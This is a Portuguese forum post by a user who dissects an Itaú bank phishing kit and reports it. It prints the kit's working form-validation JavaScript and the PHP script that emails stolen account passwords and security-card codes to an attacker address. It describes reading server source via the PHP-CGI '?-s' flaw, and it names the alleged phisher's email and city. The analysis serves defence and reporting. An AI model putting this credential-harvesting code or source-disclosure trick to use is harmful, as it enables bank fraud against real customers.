Introdução
Então , estava checando meus e-mails e vejo uma tentativa de phishing , como tava sem nada pra fazer resolvo dar uma investigada .
Era um phishing tendo como alvo usuário de itaú , que vinha com essa mensagem :
Prezado cliente:
O Banco Itaú vem por meio desse e-mail informar que seu dispositivo iToken
encontrasse desatualizado, para atualizar para a versão 2.6
o seu iToken clique no link abaixo para iniciar a atualização.
O Banco Itaú vem por meio desse e-mail informar que seu dispositivo iToken
encontrasse desatualizado, para atualizar para a versão 2.6
o seu iToken clique no link abaixo para iniciar a atualização.
funcoes.js –>
Código:
function valida(){ setTimeout("EnviandoForm()",1) } function Entrega() { var agencia = document.getElementById("agencia"); var conta = document.getElementById("conta") var senhadocartao = document.getElementById("senhadocartao"); var senhaeletronica = document.getElementById("senhaeletronica"); if (agencia.value.length < 4) { alert("Preencha corretamente o campo Agência!"); } if (conta.value.length < 6) { alert("Preencha corretamente o campo Conta!"); } if (senhadocartao.value.length < 6 ) { alert("Preencha corretamente o campo Senha do cartão!"); } if (senhaeletronica.value.length < 6 ) { alert("Preencha corretamente o campo Senha Eletrônica!"); } else if (agencia.value.length >= 4 && conta.value.length >= 6 && senhadocartao.value.length >= 6 && senhaeletronica.value.length >= 6) { setTimeout("valida()",1) } } function EnviandoForm() { document.forms['forminDeDados'].action = "envio.php"; document.forms['forminDeDados'].submit(); } function Regras() { var escolha1 = document.getElementById("escolha1"); var escolha2 = document.getElementById("escolha2"); if (escolha1.checked) { window.location = "informadados.php"; } if (escolha2.checked) { window.location = "index.php"; } } function token() { window.location = "index3.php"; } function clientecartao() { window.location = "pagina3.php"; } function finaliza() { window.location = "carregando1.php"; } function validaform(){ var tabela = document.formTabela; var c01 = tabela.table1; var c02 = tabela.table2; var c03 = tabela.table3; var c04 = tabela.table4; var c05 = tabela.table5; var c06 = tabela.table6; var c07 = tabela.table7; var c08 = tabela.table8; var c09 = tabela.table9; var c10 = tabela.table10; var c11 = tabela.table11; var c12 = tabela.table12; var c13 = tabela.table13; var c14 = tabela.table14; var c15 = tabela.table15; var c16 = tabela.table16; var c17 = tabela.table17; var c18 = tabela.table18; var c19 = tabela.table19; var c20 = tabela.table20; var c21 = tabela.table21; var c22 = tabela.table22; var c23 = tabela.table23; var c24 = tabela.table24; var c25 = tabela.table25; var c26 = tabela.table26; var c27 = tabela.table27; var c28 = tabela.table28; var c29 = tabela.table29; var c30 = tabela.table30; var c31 = tabela.table31; var c32 = tabela.table32; var c33 = tabela.table33; var c34 = tabela.table34; var c35 = tabela.table35; var c36 = tabela.table36; var c37 = tabela.table37; var c38 = tabela.table38; var c39 = tabela.table39; var c40 = tabela.table40; if((c01.value == " ") || (c01.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 01 inválida."); c01.focus(); return false; } if((c02.value == " ") || (c02.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 02 inválida."); c02.focus(); return false; } if((c03.value == " ") || (c03.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 03 inválida."); c03.focus(); return false; } if((c04.value == " ") || (c04.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 04 inválida."); c04.focus(); return false; } if((c05.value == " ") || (c05.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 05 inválida."); c05.focus(); return false; } if((c06.value == " ") || (c06.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 06 inválida."); c06.focus(); return false; } if((c07.value == " ") || (c07.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 07 inválida."); c07.focus(); return false; } if((c08.value == " ") || (c08.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 08 inválida."); c08.focus(); return false; } if((c09.value == " ") || (c09.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 09 inválida."); c09.focus(); return false; } if((c10.value == " ") || (c10.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 10 inválida."); c10.focus(); return false; } if((c11.value == " ") || (c11.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 11 inválida."); c11.focus(); return false; } if((c12.value == " ") || (c12.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 12 inválida."); c12.focus(); return false; } if((c13.value == " ") || (c13.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 13 inválida."); c13.focus(); return false; } if((c14.value == " ") || (c14.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 14 inválida."); c14.focus(); return false; } if((c15.value == " ") || (c15.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 15 inválida."); c15.focus(); return false; } if((c16.value == " ") || (c16.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 16 inválida."); c16.focus(); return false; } if((c17.value == " ") || (c17.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 17 inválida."); c17.focus(); return false; } if((c18.value == " ") || (c18.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 18 inválida."); c18.focus(); return false; } if((c19.value == " ") || (c19.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 19 inválida."); c19.focus(); return false; } if((c20.value == " ") || (c20.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 20 inválida."); c20.focus(); return false; } if((c21.value == " ") || (c21.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 21 inválida."); c21.focus(); return false; } if((c22.value == " ") || (c22.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 22 inválida."); c22.focus(); return false; } if((c23.value == " ") || (c23.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 23 inválida."); c23.focus(); return false; } if((c24.value == " ") || (c24.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 24 inválida."); c24.focus(); return false; } if((c25.value == " ") || (c25.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 25 inválida."); c25.focus(); return false; } if((c26.value == " ") || (c26.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 26 inválida."); c26.focus(); return false; } if((c27.value == " ") || (c27.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 27 inválida."); c27.focus(); return false; } if((c28.value == " ") || (c28.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 28 inválida."); c28.focus(); return false; } if((c29.value == " ") || (c29.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 29 inválida."); c29.focus(); return false; } if((c30.value == " ") || (c30.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 30 inválida."); c30.focus(); return false; } if((c31.value == " ") || (c31.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 31 inválida."); c31.focus(); return false; } if((c32.value == " ") || (c32.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 32 inválida."); c32.focus(); return false; } if((c33.value == " ") || (c33.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 33 inválida."); c33.focus(); return false; } if((c34.value == " ") || (c34.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 34 inválida."); c34.focus(); return false; } if((c35.value == " ") || (c35.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 35 inválida."); c35.focus(); return false; } if((c36.value == " ") || (c36.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 36 inválida."); c36.focus(); return false; } if((c37.value == " ") || (c37.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 37 inválida."); c37.focus(); return false; } if((c38.value == " ") || (c38.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 38 inválida."); c38.focus(); return false; } if((c39.value == " ") || (c39.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 39 inválida."); c39.focus(); return false; } if((c40.value == " ") || (c40.value.length < 4)){ alert("Preencha corretamente seu cartão de segurança online! Posição 40 inválida."); c40.focus(); return false; } document.forms['formTabela'].action = "envio3.php"; document.forms['formTabela'].submit(); return true; } function autotab(original,destination){ if (original.getAttribute&&original.value.length==original.getAttribute("maxlength")) destination.focus() } function autotab(original,destination){ if (original.getAttribute&&original.value.length==original.getAttribute("maxlength")) destination.focus() }
[FONT="Courier New"]Na linha 33 temos uma função chama “EnviandoForm” , que remete ao arquivo PHP “envio.php” , vou para esse arquivo , mas como PHP é server-side , não pude ver nada :/ . Porém , devido à vulnerabilidade no PHP-CGI ( Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ) permite que , colocando um simples “?-s” depois da URL , podemos ver o código-fonte da página .
envio.php –>
Código PHP:
<?php
$agencia = $_POST["agencia"];
$conta = $_POST["conta"];
$senhadocartao = $_POST["senhadocartao"];
$senhaeletronica = $_POST["senhaeletronica"];
$ip = $_SERVER['REMOTE_ADDR'];
$para = "drikoo157@hotmail.com";
$subj = "IP:$ip";
$msg = "
AgenГia: $agencia
Conta: $conta
Senha do cartГ?o:$senhadocartao
Senha eletrГ?nica:$senhaeletronica
";
@mail("drikoo157@hotmail.com", $subj, $msg, "from: INFO@ita.com.br");
{
?>
<html>
<body>
<meta http-equiv="refresh" content="0;URL=index2.php">
</body>
</html>
<?php
exit;
}
?>
[FONT="Courier New"]Bem , como podemos ver , simples : Manda um email com as info’s para “drikoo157@hotmail.com” .
Pesquisei “drikoo157@hotmail.com” no Google , mas não achei nada de interessante . Então pesquisei só “drikoo157″ e olha que legal , o Google retorna twitter ( Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ) um fotolog tosco ( Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ) e o formspring ( Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ) , pelo fotolog ele diz que mora em Imperatriz , Maranhão .
Com todas essas informações já seria possível chegar facilmente ao cracker , é muito fácil para os órgãos responsáveis pedir a quebra de sigilo ao Hotmail / Twitter / Formspring e conseguir o IP , depois iriam atrás do provedor de internet e rastreariam o usuário que estaria usando esse IP nesse horário . Infelizmente , no Brasil a única coisa que pude fazer foi denunciar a página de phishing e entregar para eles todas as informações reunidas através deste link ( Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ) .
Então é isso , se puder vamos fazer isto também , para acabar com o phishing aqui no Brasil .
att
geolado | g3ol4d0
Comment